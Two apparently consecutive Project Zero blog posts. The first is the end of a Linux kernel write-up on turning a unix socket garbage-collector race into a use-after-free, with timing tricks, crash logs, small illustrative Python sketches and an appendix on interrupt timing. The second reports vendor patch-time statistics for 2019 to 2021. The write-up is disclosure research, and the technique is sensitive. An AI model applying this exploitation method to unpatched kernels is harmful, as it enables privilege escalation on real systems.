To turn this bug into memory corruption, we have to abuse that the recvmsg() path assumes that SKBs on the receive queue are protected from deletion by the socket mutex while the GC actually deletes SKBs from the receive queue without touching the socket mutex. For that purpose, while the unix GC is running, we have to start a recvmsg() call that looks up the victim SKB, block until the unix GC has freed the SKB, and then let recvmsg() continue operating on the freed SKB. This is fairly straightforward - while it is a race, we can easily slow down unix_gc() for multiple milliseconds by creating lots of sockets that are not directly referenced from the FD table and have many tiny SKBs queued up - here's a graph showing the unix GC execution time on my laptop, depending on the number of queued SKBs that the GC has to scan through:

A graph showing the time spent per GC run depending on the number of queued SKBs. The relationship is roughly linear.

To turn this into a UAF, it's also necessary to get past the following check near the end of unix_gc():

        /* All candidates should have been detached by now. */
        BUG_ON(!list_empty(&gc_candidates));

gc_candidates is a list that previously contained all sockets that were deemed to be unreachable by the GC. Then, the GC attempted to free all those sockets by eliminating their mutual references. If we manage to keep a reference to one of the sockets that the GC thought was going away, the GC detects that with the BUG_ON().

But we don't actually need the victim SKB to reference a socket that the GC thinks is going away; in scan_inflight(), the GC targets any SKB with a socket that is marked UNIX_GC_CANDIDATE, meaning it just had to be a candidate for being scanned by the GC. So by making the victim SKB hold a reference to a socket that is not directly referenced from a file descriptor table, but is indirectly referenced by a file descriptor table through another socket, we can ensure that the BUG_ON() won't trigger.
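The reference topology described above (a socket that no file descriptor points to directly, but that is still reachable through a message queued on another socket) can be sketched from user space with SCM_RIGHTS. This is only an illustration of the in-flight state, not the reproducer: the variable names are made up for this example, and it assumes Linux with Python 3.9 or newer for socket.send_fds() and socket.recv_fds().

```python
import socket

# Carrier pair: both ends stay open in our file descriptor table.
carrier_a, carrier_b = socket.socketpair(socket.AF_UNIX, socket.SOCK_STREAM)
# Inner pair: one end will end up referenced only by a queued message.
inner_a, inner_b = socket.socketpair(socket.AF_UNIX, socket.SOCK_STREAM)

# Queue one byte on carrier_b's receive queue with inner_b attached as
# SCM_RIGHTS ancillary data. The queued SKB now holds a reference to inner_b.
socket.send_fds(carrier_a, [b"x"], [inner_b.fileno()])

# Drop the direct FD-table reference. inner_b is now "in flight": it stays
# alive only because the SKB queued on carrier_b references it.
inner_b.close()

# Data can still be queued on the in-flight socket through its peer.
inner_a.send(b"still alive")

# Receiving the message installs a fresh descriptor for the same socket.
data, fds, _flags, _addr = socket.recv_fds(carrier_b, 1, 1)
revived = socket.socket(fileno=fds[0])
msg = revived.recv(32)
print(data, msg)
```

While inner_b is in flight it is indirectly reachable from the FD table via carrier_b, which is the kind of socket the paragraph above relies on.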

I extended my reproducer with this trick and some userfaultfd trickery to make recv() run with the right timing. Nowadays you don't necessarily get full access to userfaultfd as a normal user, but since I'm just trying to show the concept, and there are alternatives to userfaultfd (using FUSE or just slow disk access), that's good enough for this blogpost.

When a normal distro kernel is running normally, the UAF reproducer's UAF accesses won't actually be noticeable; but if you add the kernel command line flag slub_debug=FP (to enable SLUB's poisoning and sanity checks), the reproducer quickly crashes twice, first with a poison dereference and then a poison overwrite detection, showing that one byte of the poison was incremented:

general protection fault, probably for non-canonical address 0x6b6b6b6b6b6b6b6b: 0000 [#1] SMP NOPTI

CPU: 1 PID: 2655 Comm: hardirq_loop Not tainted 5.10.0-9-amd64 #1 Debian 5.10.70-1

[...]

RIP: 0010:unix_stream_read_generic+0x72b/0x870

Code: fe ff ff 31 ff e8 85 87 91 ff e9 a5 fe ff ff 45 01 77 44 8b 83 80 01 00 00 85 c0 0f 89 10 01 00 00 49 8b 47 38 48 85 c0 74 23 <0f> bf 00 66 85 c0 0f 85 20 01 00 00 4c 89 fe 48 8d 7c 24 58 44 89

RSP: 0018:ffffb789027f7cf0 EFLAGS: 00010202

RAX: 6b6b6b6b6b6b6b6b RBX: ffff982d1d897b40 RCX: 0000000000000000

RDX: 6a0fe1820359dce8 RSI: ffffffffa81f9ba0 RDI: 0000000000000246

RBP: ffff982d1d897ea8 R08: 0000000000000000 R09: 0000000000000000

R10: 0000000000000000 R11: ffff982d2645c900 R12: ffffb789027f7dd0

R13: ffff982d1d897c10 R14: 0000000000000001 R15: ffff982d3390e000

FS:  00007f547209d740(0000) GS:ffff98309fa40000(0000) knlGS:0000000000000000

CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033

CR2: 00007f54722cd000 CR3: 00000001b61f4002 CR4: 0000000000770ee0

PKRU: 55555554

Call Trace:

[...]

 unix_stream_recvmsg+0x53/0x70

[...]

 __sys_recvfrom+0x166/0x180

[...]

 __x64_sys_recvfrom+0x25/0x30

 do_syscall_64+0x33/0x80

 entry_SYSCALL_64_after_hwframe+0x44/0xa9

[...]

---[ end trace 39a81eb3a52e239c ]---

=============================================================================

BUG skbuff_head_cache (Tainted: G      D          ): Poison overwritten

-----------------------------------------------------------------------------

INFO: 0x00000000d7142451-0x00000000d7142451 @offset=68. First byte 0x6c instead of 0x6b

INFO: Slab 0x000000002f95c13c objects=32 used=32 fp=0x0000000000000000 flags=0x17ffffc0010200

INFO: Object 0x00000000ef9c59c8 @offset=0 fp=0x00000000100a3918

Object   00000000ef9c59c8: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   0000000097454be8: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   0000000035f1d791: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   00000000af71b907: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   000000000d2d371e: 6b 6b 6b 6b 6c 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkklkkkkkkkkkkk

Object   0000000000744b35: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   00000000794f2935: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   000000006dc06746: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   000000005fb18682: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   0000000072eb8dd2: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   00000000b5b572a9: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   0000000085d6850b: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   000000006346150b: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   000000000ddd1ced: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b a5  kkkkkkkkkkkkkkk.

Padding  00000000e00889a7: 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a  ZZZZZZZZZZZZZZZZ

Padding  00000000d190015f: 5a 5a 5a 5a 5a 5a 5a 5a                          ZZZZZZZZ

CPU: 7 PID: 1641 Comm: gnome-shell Tainted: G    B D           5.10.0-9-amd64 #1 Debian 5.10.70-1

[...]

Call Trace:

 dump_stack+0x6b/0x83

 check_bytes_and_report.cold+0x79/0x9a

 check_object+0x217/0x260

[...]

 alloc_debug_processing+0xd5/0x130

 ___slab_alloc+0x511/0x570

[...]

 __slab_alloc+0x1c/0x30

 kmem_cache_alloc_node+0x1f3/0x210

 __alloc_skb+0x46/0x1f0

 alloc_skb_with_frags+0x4d/0x1b0

 sock_alloc_send_pskb+0x1f3/0x220

[...]

 unix_stream_sendmsg+0x268/0x4d0

 sock_sendmsg+0x5e/0x60

 ____sys_sendmsg+0x22e/0x270

[...]

 ___sys_sendmsg+0x75/0xb0

[...]

 __sys_sendmsg+0x59/0xa0

 do_syscall_64+0x33/0x80

 entry_SYSCALL_64_after_hwframe+0x44/0xa9

[...]

FIX skbuff_head_cache: Restoring 0x00000000d7142451-0x00000000d7142451=0x6b

FIX skbuff_head_cache: Marking all objects used

RIP: 0010:unix_stream_read_generic+0x72b/0x870

Code: fe ff ff 31 ff e8 85 87 91 ff e9 a5 fe ff ff 45 01 77 44 8b 83 80 01 00 00 85 c0 0f 89 10 01 00 00 49 8b 47 38 48 85 c0 74 23 <0f> bf 00 66 85 c0 0f 85 20 01 00 00 4c 89 fe 48 8d 7c 24 58 44 89

RSP: 0018:ffffb789027f7cf0 EFLAGS: 00010202

RAX: 6b6b6b6b6b6b6b6b RBX: ffff982d1d897b40 RCX: 0000000000000000

RDX: 6a0fe1820359dce8 RSI: ffffffffa81f9ba0 RDI: 0000000000000246

RBP: ffff982d1d897ea8 R08: 0000000000000000 R09: 0000000000000000

R10: 0000000000000000 R11: ffff982d2645c900 R12: ffffb789027f7dd0

R13: ffff982d1d897c10 R14: 0000000000000001 R15: ffff982d3390e000

FS:  00007f547209d740(0000) GS:ffff98309fa40000(0000) knlGS:0000000000000000

CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033

CR2: 00007f54722cd000 CR3: 00000001b61f4002 CR4: 0000000000770ee0

PKRU: 55555554
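The offset that SLUB reports can be cross-checked against the hexdump by hand: the modified byte sits in the fifth 16-byte row at index 4, so its offset is 4 * 16 + 4 = 68. A minimal sketch of that check, assuming the standard SLUB poison values (0x6b for freed memory, 0xa5 for the final byte of the object); the helper name find_corruption is made up for this example, and the dump is rebuilt from the rows shown above rather than parsed from a real log:

```python
POISON_FREE = 0x6B  # fill byte SLUB writes into freed objects
POISON_END = 0xA5   # marker SLUB writes into the last byte of the object

# Rebuild the 14 "Object" rows from the report above, 16 bytes per row.
rows = [bytearray([POISON_FREE] * 16) for _ in range(14)]
rows[4][4] = 0x6C          # fifth row: "6b 6b 6b 6b 6c ..."
rows[13][15] = POISON_END  # last row ends in a5
obj = b"".join(rows)


def find_corruption(data):
    """Return (offset, value) for every byte that does not match the poison."""
    hits = []
    for offset, value in enumerate(data):
        expected = POISON_END if offset == len(data) - 1 else POISON_FREE
        if value != expected:
            hits.append((offset, value))
    return hits


hits = find_corruption(obj)
for offset, value in hits:
    print(f"offset={offset} value={value:#04x}")
```

The single hit matches the "@offset=68. First byte 0x6c instead of 0x6b" line in the report.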

Conclusion(s)

Hitting a race can become easier if, instead of racing two threads against each other, you race one thread against a hardware timer to create a gigantic timing window for the other thread. Hence the title! On the other hand, it introduces extra complexity because now you have to think about how timers actually work, and, as it turns out, time is a complicated concept...

This shows how at least some really tight races can still be hit and we should treat them as security bugs, even if it seems like they'd be very hard to hit at first glance.

Also, precisely timing races is hard, and the details of how long it actually takes the CPU to get from one point to another are mysterious. (As not only exploit writers know, but also anyone who's ever wanted to benchmark a performance-relevant change...)

Appendix: How impatient are interrupts?

I did also play around with this stuff on arm64 a bit, and I was wondering: At what points do interrupts actually get delivered? Does an incoming interrupt force the CPU to drop everything immediately, or do inflight operations finish first? This gets particularly interesting on phones that contain two or three different types of CPUs mixed together.

On a Pixel 4 (which has 4 slow in-order cores, 3 fast cores, and 1 faster core), I tried firing an interval timer at 100Hz (using timer_create()), with a signal handler that logs the PC register, while running this loop:

  400680:        91000442         add        x2, x2, #0x1

  400684:        91000421         add        x1, x1, #0x1

  400688:        9ac20820         udiv        x0, x1, x2

  40068c:        91006800         add        x0, x0, #0x1a

  400690:        91000400         add        x0, x0, #0x1

  400694:        91000442         add        x2, x2, #0x1

  400698:        91000421         add        x1, x1, #0x1

  40069c:        91000442         add        x2, x2, #0x1

  4006a0:        91000421         add        x1, x1, #0x1

  4006a4:        9ac20820         udiv        x0, x1, x2

  4006a8:        91006800         add        x0, x0, #0x1a

  4006ac:        91000400         add        x0, x0, #0x1

  4006b0:        91000442         add        x2, x2, #0x1

  4006b4:        91000421         add        x1, x1, #0x1

  4006b8:        91000442         add        x2, x2, #0x1

  4006bc:        91000421         add        x1, x1, #0x1

  4006c0:        17fffff0         b        400680 <main+0xe0>

The logged interrupt PCs had the following distribution on a slow in-order core:

A histogram of PC register values, where most instructions in the loop have roughly equal frequency, the instructions after udiv instructions have twice the frequency, and two other instructions have zero frequency.

and this distribution on a fast out-of-order core:

A histogram of PC register values, where the first instruction of the loop has very high frequency, the following 4 instructions have near-zero frequency, and the following instructions have low frequencies

As always, out-of-order (OOO) cores make everything weird, and the start of the loop seems to somehow "provide cover" for the following instructions; but on the in-order core, we can see that more interrupts arrive after the slow udiv instructions. So apparently, when one of those is executing while an interrupt arrives, it continues executing and doesn't get aborted somehow?
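The measurement idea (a 100Hz interval timer whose handler records where execution was interrupted) can be tried at a much coarser level from Python. This is a loose analog and not the harness used for the graphs above: it uses signal.setitimer() instead of timer_create(), it records source line numbers instead of PC values, and the function and variable names are made up for this example. It assumes a Unix system and must run in the main thread.

```python
import collections
import signal
import time

samples = collections.Counter()


def on_tick(signum, frame):
    # "frame" is the Python frame that was executing when the handler ran;
    # its line number stands in for the PC register of the native test.
    samples[frame.f_lineno] += 1


signal.signal(signal.SIGALRM, on_tick)
signal.setitimer(signal.ITIMER_REAL, 0.01, 0.01)  # first tick and interval: 10ms


def busy_loop(duration):
    deadline = time.monotonic() + duration
    x, y = 1, 1
    while time.monotonic() < deadline:
        x += 1
        y += 1
        z = y // x  # a division, loosely mirroring the udiv in the loop above
        x += 1
    return x


busy_loop(0.5)
signal.setitimer(signal.ITIMER_REAL, 0)  # disarm the timer
total = sum(samples.values())
for line, count in sorted(samples.items()):
    print(line, count)
```

CPython only runs signal handlers between bytecode instructions, so the recorded line is always one where the interpreter had already finished its current operation. That is a software effect, but it skews the histogram in a way that resembles what the in-order core shows after udiv.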

With the following loop, which has an LDR instruction mixed in that accesses a memory location that is constantly being modified by another thread:

  4006a0:        91000442         add        x2, x2, #0x1

  4006a4:        91000421         add        x1, x1, #0x1

  4006a8:        9ac20820         udiv        x0, x1, x2

  4006ac:        91006800         add        x0, x0, #0x1a

  4006b0:        91000400         add        x0, x0, #0x1

  4006b4:        91000442         add        x2, x2, #0x1

  4006b8:        91000421         add        x1, x1, #0x1

  4006bc:        91000442         add        x2, x2, #0x1

  4006c0:        91000421         add        x1, x1, #0x1

  4006c4:        9ac20820         udiv        x0, x1, x2

  4006c8:        91006800         add        x0, x0, #0x1a

  4006cc:        91000400         add        x0, x0, #0x1

  4006d0:        91000442         add        x2, x2, #0x1

  4006d4:        f9400061         ldr        x1, [x3]

  4006d8:        91000421         add        x1, x1, #0x1

  4006dc:        91000442         add        x2, x2, #0x1

  4006e0:        91000421         add        x1, x1, #0x1

  4006e4:        17ffffef         b        4006a0 <main+0x100>

the cache-missing loads obviously have a large influence on the timing. On the in-order core:

A histogram of interrupt instruction pointers, showing that most interrupts are delivered with PC pointing to the instruction after the high-latency load instruction.

On the OOO core:

A similar histogram as the previous one, except that an even larger fraction of interrupt PCs are after the high-latency load instruction.

What is interesting to me here is that the timer interrupts seem to again arrive after the slow load - implying that if an interrupt arrives while a slow memory access is in progress, the interrupt handler may not get to execute until the memory access has finished? (Unless maybe on the OOO core the interrupt handler can start speculating already? I wouldn't really expect that, but could imagine it.)

On an X86 Skylake CPU, we can do a similar test:

    11b8:        48 83 c3 01                  add    $0x1,%rbx

    11bc:        48 83 c0 01                  add    $0x1,%rax

    11c0:        48 01 d8                     add    %rbx,%rax

    11c3:        48 83 c3 01                  add    $0x1,%rbx

    11c7:        48 83 c0 01                  add    $0x1,%rax

    11cb:        48 01 d8                     add    %rbx,%rax

    11ce:        48 03 02                     add    (%rdx),%rax

    11d1:        48 83 c0 01                  add    $0x1,%rax

    11d5:        48 83 c3 01                  add    $0x1,%rbx

    11d9:        48 01 d8                     add    %rbx,%rax

    11dc:        48 83 c3 01                  add    $0x1,%rbx

    11e0:        48 83 c0 01                  add    $0x1,%rax

    11e4:        48 01 d8                     add    %rbx,%rax

    11e7:        eb cf                        jmp    11b8 <main+0xf8>

with a similar result:

A histogram of interrupt instruction pointers, showing that almost all interrupts were delivered with RIP pointing to the instruction after the high-latency load.

This means that if the first access to the file terminated our race window (which is not the case), we probably wouldn't be able to win the race by making the access to the file slow - instead we'd have to slow down one of the operations before that. (But note that I have only tested simple loads, not stores or read-modify-write operations here.)

A walk through Project Zero metrics

Posted by Ryan Schoen, Project Zero

tl;dr

  • In 2021, vendors took an average of 52 days to fix security vulnerabilities reported from Project Zero. This is a significant acceleration from an average of about 80 days 3 years ago.
  • In addition to the average now being well below the 90-day deadline, we have also seen a dropoff in vendors missing the deadline (or the additional 14-day grace period). In 2021, only one bug exceeded its fix deadline, though 14% of bugs required the grace period.
  • Differences in the amount of time it takes a vendor/product to ship a fix to users reflect their product design, development practices, update cadence, and general processes for handling security reports. We hope that this comparison can showcase best practices, and encourage vendors to experiment with new policies.
  • This data aggregation and analysis is relatively new for Project Zero, but we hope to do it more in the future. We encourage all vendors to consider publishing aggregate data on their time-to-fix and time-to-patch for externally reported vulnerabilities, as well as more data sharing and transparency in general.

Overview

For nearly ten years, Google’s Project Zero has been working to make it more difficult for bad actors to find and exploit security vulnerabilities, significantly improving the security of the Internet for everyone. In that time, we have partnered with folks across industry to transform the way organizations prioritize and approach fixing security vulnerabilities and updating people’s software.

To help contextualize the shifts we are seeing the ecosystem make, we looked back at the set of vulnerabilities Project Zero has been reporting, how a range of vendors have been responding to them, and then attempted to identify trends in this data, such as how the industry as a whole is patching vulnerabilities faster.

For this post, we look at fixed bugs that were reported between January 2019 and December 2021 (2019 is the year we made changes to our disclosure policies and also began recording more detailed metrics on our reported bugs). The data we'll be referencing is publicly available on the Project Zero Bug Tracker, and on various open source project repositories (in the case of the data used below to track the timeline of open-source browser bugs).

There are a number of caveats with our data, the largest being that we'll be looking at a small number of samples, so differences in numbers may or may not be statistically significant. Also, the direction of Project Zero's research is almost entirely influenced by the choices of individual researchers, so changes in our research targets could shift metrics as much as changes in vendor behaviors could. As much as possible, this post is designed to be an objective presentation of the data, with additional subjective analysis included at the end.

The data!

Between 2019 and 2021, Project Zero reported 376 issues to vendors under our standard 90-day deadline. 351 (93.4%) of these bugs have been fixed, while 14 (3.7%) have been marked as WontFix by the vendors. 11 (2.9%) other bugs remain unfixed, though at the time of this writing 8 have passed their deadline to be fixed; the remaining 3 are still within their deadline to be fixed. Most of the vulnerabilities are clustered around a few vendors, with 96 bugs (26%) being reported to Microsoft, 85 (23%) to Apple, and 60 (16%) to Google.
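The percentages in this paragraph follow directly from the counts. A quick check, using only the numbers quoted above (the variable names are made up for this example):

```python
reported = 376

# Outcome of each reported issue, as quoted in the paragraph above.
status = {"fixed": 351, "wontfix": 14, "unfixed": 11}
# The three vendors with the most reports.
vendors = {"Microsoft": 96, "Apple": 85, "Google": 60}

# The three outcomes should account for every reported issue.
accounted_for = sum(status.values())

status_pct = {k: round(100 * v / reported, 1) for k, v in status.items()}
vendor_pct = {k: round(100 * v / reported) for k, v in vendors.items()}

print(accounted_for, status_pct, vendor_pct)
```

Together, the three vendors account for 241 of the 376 reports, or a little under two thirds.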

Deadline adherence

Once a vendor receives a bug report under our standard deadline, they have 90 days to fix it and ship a patched version to the public. The vendor can also request a 14-day grace period if the vendor confirms they plan to release the fix by the end of that total 104-day window.
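One way to read this policy is as a three-way classification of each fixed bug, which is also how the columns of the table below are organized. A minimal sketch, assuming that a fix landing after day 90 only counts as "grace period" if the vendor actually requested it; the function name and the grace_requested flag are made up for this example:

```python
DEADLINE_DAYS = 90
GRACE_DAYS = 14


def classify(days_to_fix, grace_requested=False):
    """Map a time-to-fix in days onto the three deadline outcomes."""
    if days_to_fix <= DEADLINE_DAYS:
        return "fixed by day 90"
    if grace_requested and days_to_fix <= DEADLINE_DAYS + GRACE_DAYS:
        return "fixed during grace period"
    return "exceeded deadline & grace period"


for days, grace in [(61, False), (100, True), (100, False), (105, True)]:
    print(days, grace, classify(days, grace))
```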

In this section, we'll be taking a look at how often vendors are able to hit these deadlines. The table below includes all bugs that have been reported to the vendor under the 90-day deadline since January 2019 and have since been fixed, for vendors with the most bug reports in the window.

Deadline adherence and fix time 2019-2021, by bug report volume

Vendor    | Total bugs | Fixed by day 90 | Fixed during grace period | Exceeded deadline & grace period | Avg days to fix
Apple     | 84         | 73 (87%)        | 7 (8%)                    | 4 (5%)                           | 69
Microsoft | 80         | 61 (76%)        | 15 (19%)                  | 4 (5%)                           | 83
Google    | 56         | 53 (95%)        | 2 (4%)                    | 1 (2%)                           | 44
Linux     | 25         | 24 (96%)        | 0 (0%)                    | 1 (4%)                           | 25
Adobe     | 19         | 15 (79%)        | 4 (21%)                   | 0 (0%)                           | 65
Mozilla   | 10         | 9 (90%)         | 1 (10%)                   | 0 (0%)                           | 46
Samsung   | 10         | 8 (80%)         | 2 (20%)                   | 0 (0%)                           | 72
Oracle    | 7          | 3 (43%)         | 0 (0%)                    | 4 (57%)                          | 109
Others*   | 55         | 48 (87%)        | 3 (5%)                    | 4 (7%)                           | 44
TOTAL     | 346        | 294 (84%)       | 34 (10%)                  | 18 (5%)                          | 61

* For completeness, the vendors included in the "Others" bucket are Apache, ASWF, Avast, AWS, c-ares, Canonical, F5, Facebook, git, Github, glibc, gnupg, gnutls, gstreamer, haproxy, Hashicorp, insidesecure, Intel, Kubernetes, libseccomp, libx264, Logmein, Node.js, opencontainers, QT, Qualcomm, RedHat, Reliance, SCTPLabs, Signal, systemd, Tencent, Tor, udisks, usrsctp, Vandyke, VietTel, webrtc, and Zoom.

Overall, the data show that almost all of the big vendors here are coming in under 90 days, on average. The bulk of fixes during a grace period come from Apple and Microsoft (22 out of 34 total).

Vendors have exceeded the deadline and grace period about 5% of the time over this period. In this slice, Oracle exceeded the deadline at the highest rate, but admittedly with a relatively small sample size of only 7 bugs. The next-highest rate is Microsoft's, having exceeded 4 of their 80 deadlines.

The average number of days to fix bugs across all vendors is 61. Zooming in on just that stat, we can break it out by year:

Bug fix time 2019-2021, by bug report volume

Vendor    | Bugs in 2019 (avg days to fix) | Bugs in 2020 (avg days to fix) | Bugs in 2021 (avg days to fix)
Apple     | 61 (71)                        | 13 (63)                        | 11 (64)
Microsoft | 46 (85)                        | 18 (87)                        | 16 (76)
Google    | 26 (49)                        | 13 (22)                        | 17 (53)
Linux     | 12 (32)                        | 8 (22)                         | 5 (15)
Others*   | 54 (63)                        | 35 (54)                        | 14 (29)
TOTAL     | 199 (67)                       | 87 (54)                        | 63 (52)

* For completeness, the vendors included in the "Others" bucket are Adobe, Apache, ASWF, Avast, AWS, c-ares, Canonical, F5, Facebook, git, Github, glibc, gnupg, gnutls, gstreamer, haproxy, Hashicorp, insidesecure, Intel, Kubernetes, libseccomp, libx264, Logmein, Mozilla, Node.js, opencontainers, Oracle, QT, Qualcomm, RedHat, Reliance, Samsung, SCTPLabs, Signal, systemd, Tencent, Tor, udisks, usrsctp, Vandyke, VietTel, webrtc, and Zoom.

From this, we can see a few things: first of all, the overall time to fix has consistently been decreasing, but most significantly between 2019 and 2020. Microsoft, Apple, and Linux overall have reduced their time to fix during the period, whereas Google sped up in 2020 before slowing down again in 2021. Perhaps most impressively, the vendors grouped under "Others" have collectively cut their time to fix by more than half, though it's possible this represents a change in research targets rather than a change in practices for any particular vendor.

Finally, focusing on just 2021, we see:

  • Only 1 deadline exceeded, versus an average of 9 per year in the other two years
  • The grace period used 9 times (notably with half being by Microsoft), versus the somewhat higher average of 12.5 per year in the other two years
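The "other years" averages in these two bullets can be recovered from the TOTAL row of the deadline adherence table by subtracting the 2021 counts and dividing by the two remaining years. A small sketch of that arithmetic (variable names made up for this example):

```python
# 2019-2021 totals from the TOTAL row of the deadline adherence table.
total_exceeded = 18
total_grace = 34

# 2021 counts from the two bullets above.
exceeded_2021 = 1
grace_2021 = 9

other_years = 2  # 2019 and 2020
avg_exceeded_other = (total_exceeded - exceeded_2021) / other_years
avg_grace_other = (total_grace - grace_2021) / other_years

print(avg_exceeded_other, avg_grace_other)
```

This gives 8.5 missed deadlines per year (the "9" above, after rounding) and 12.5 grace-period uses per year for 2019 and 2020, so the 2021 figure of 9 grace-period uses is below that earlier average.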

Mobile phones

Since the products in the previous table span a range of types (desktop operating systems, mobile operating systems, browsers), we can also focus on a particular, hopefully more apples-to-apples comparison: mobile phone operating systems.

Vendor            | Total bugs | Avg fix time (days)
iOS               | 76         | 70
Android (Samsung) | 10         | 72
Android (Pixel)   | 6          | 72

The first thing to note is that it appears that iOS received remarkably more bug reports from Project Zero than any flavor of Android did during this time period, but rather than an imbalance in research target selection, this is more a reflection of how Apple ships software. Security updates for "apps" such as iMessage, Facetime, and Safari/WebKit are all shipped as part of the OS updates, so we include those in the analysis of the operating system. On the other hand, security updates for standalone apps on Android happen through the Google Play Store, so they are not included here in this analysis.

Despite that, all three vendors have an extraordinarily similar average time to fix. With the data we have available, it's hard to determine how much time is spent on each part of the vulnerability lifecycle (e.g. triage, patch authoring, testing, etc). However, open-source products do provide a window into where time is spent.

Browsers

For most software, we aren't able to dig into specifics of the timeline. Specifically: after a vendor receives a report of a security issue, how much of the "time to fix" is spent between the bug report and landing the fix, and how much time is spent between landing that fix and releasing a build with the fix? The one window we do have is into open-source software, and specific to the type of vulnerability research that Project Zero does, open-source browsers.

Fix time analysis for open-source browsers, by bug volume

Browser | Bugs | Avg days from bug report to public patch | Avg days from public patch to release | Avg days from bug report to release
Chrome  | 40   | 5.3                                      | 24.6                                  | 29.9
WebKit  | 27   | 11.6                                     | 61.1                                  | 72.7
Firefox | 8    | 16.6                                     | 21.1                                  | 37.8
Total   | 75   | 8.8                                      | 37.3                                  | 46.1

We can also take a look at the same data, but with each bug spread out in a histogram. In particular, the histogram of the amount of time from a fix being landed in public to that fix being shipped to users shows a clear story (in the table above, this corresponds to the "Avg days from public patch to release" column):

Histogram showing the distributions of time from a fix landing in public to a fix shipping for Firefox, Webkit, and Chrome. The fact that Webkit is still on the higher end of the histogram tells us that most of their time is spent shipping the fixed build after the fix has landed.

The table and chart together tell us a few things:

Chrome is currently the fastest of the three browsers, averaging 30 days from bug report to releasing a fix in the stable channel. The time to patch is very fast here, with an average of just 5 days between the bug report and the patch landing in public. The time for that patch to be released to the public is the bulk of the overall time window, though overall we still see the Chrome (blue) bars of the histogram toward the left side of the histogram. (Important note: despite being housed within the same company, Project Zero follows the same policies and procedures with Chrome that an external security researcher would follow. More information on that is available in our Vulnerability Disclosure FAQ.)

Firefox comes in second in this analysis, though with a relatively small number of data points to analyze. Firefox releases a fix on average in 38 days. A little under half of that is time for the fix to land in public, though it's important to note that Firefox intentionally delays committing security patches to reduce the amount of exposure before the fix is released. Once the patch has been made public, it releases the fixed build on average a few days faster than Chrome – with the vast majority of the fixes shipping 10-15 days after their public patch.

WebKit is the outlier in this analysis, with the longest time to release a patch at 73 days. Their time to land the fix publicly is in the middle between Chrome and Firefox, but unfortunately this leaves a very long amount of time for opportunistic attackers to find the patch and exploit it prior to the fix being made available to users. This can be seen by the Apple (red) bars of the second histogram mostly being on the right side of the graph, and all but one of them being past the 30-day mark.
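The "Total" row of the browser table is consistent with a bug-count-weighted average of the per-browser rows. A minimal sketch of that check, using only the numbers from the table; that the row was produced this way is an assumption, and the variable and function names are made up for this example:

```python
# browser: (bugs, report -> public patch, public patch -> release, report -> release)
browsers = {
    "Chrome": (40, 5.3, 24.6, 29.9),
    "WebKit": (27, 11.6, 61.1, 72.7),
    "Firefox": (8, 16.6, 21.1, 37.8),
}

total_bugs = sum(row[0] for row in browsers.values())


def weighted(col):
    """Average of one column, weighted by each browser's bug count."""
    return sum(row[0] * row[col] for row in browsers.values()) / total_bugs


report_to_patch = weighted(1)
patch_to_release = weighted(2)
report_to_release = weighted(3)

print(total_bugs)
print(f"{report_to_patch:.2f} {patch_to_release:.2f} {report_to_release:.2f}")
```

The results land within about 0.1 of the published 8.8, 37.3, and 46.1, which is what one would expect if the per-browser averages in the table were themselves rounded. Chrome has the most bugs, so its short time to patch pulls the overall average well below the WebKit and Firefox figures.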

Analysis, hopes, and dreams

Overall, we see a number of promising trends emerging from the data. Vendors are fixing almost all of the bugs that they receive, and they generally do it within the 90-day deadline plus the 14-day grace period when needed. Over the past three years vendors have, for the most part, accelerated their patching, effectively reducing the overall average time to fix to about 52 days. In 2021, there was only one 90-day deadline exceeded. We suspect that this trend may be due to the fact that responsible disclosure policies have become the de facto standard in the industry, and vendors are more equipped to react rapidly to reports with differing deadlines. We also suspect that vendors have learned best practices from each other, as there has been increasing transparency in the industry.

One important caveat: we are aware that reports from Project Zero may be outliers compared to other bug reports, in that they may receive faster action as there is a tangible risk of public disclosure (as the team will disclose if deadline conditions are not met) and Project Zero is a trusted source of reliable bug reports. We encourage vendors to release metrics, even if they are high level, to give a better overall picture of how quickly security issues are being fixed across the industry, and continue to encourage other security researchers to share their experiences.

For Google, and in particular Chrome, we suspect that the quick turnaround time on security bugs is in part due to their rapid release cycle, as well as their additional stable releases for security updates. We're encouraged by Chrome's recent switch from a 6-week release cycle to a 4-week release cycle. On the Android side, we see the Pixel variant of Android releasing fixes about on par with the Samsung variants as well as iOS. Even so, we encourage the Android team to look for additional ways to speed up the application of security updates and push that segment of the industry further.

For Apple, we're pleased with the acceleration of patches landing, as well as the recent lack of both grace period use and missed deadlines. For WebKit in particular, we hope to see a reduction in the amount of time it takes between landing a patch and shipping it out to users, especially since WebKit security affects all browsers used in iOS, as WebKit is the only browser engine permitted on the iOS platform.

